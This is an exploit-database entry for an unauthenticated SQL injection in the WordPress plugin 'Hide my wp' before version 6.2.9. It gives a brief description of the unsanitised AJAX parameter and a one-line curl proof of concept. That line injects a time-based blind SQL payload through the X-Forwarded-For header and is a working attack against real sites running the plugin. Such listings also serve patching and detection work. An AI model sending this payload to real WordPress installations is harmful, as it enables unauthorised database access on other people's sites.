Hide my wp < 6.2.9 unauthenticated sqli Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2024-03-10 |
Type : webapps |
Platform : php
This exploit / vulnerability Hide my wp < 6.2.9 unauthenticated sqli is for educational purposes only and if it is used you will do on your own risk!
The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
## Proof of Concept
curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"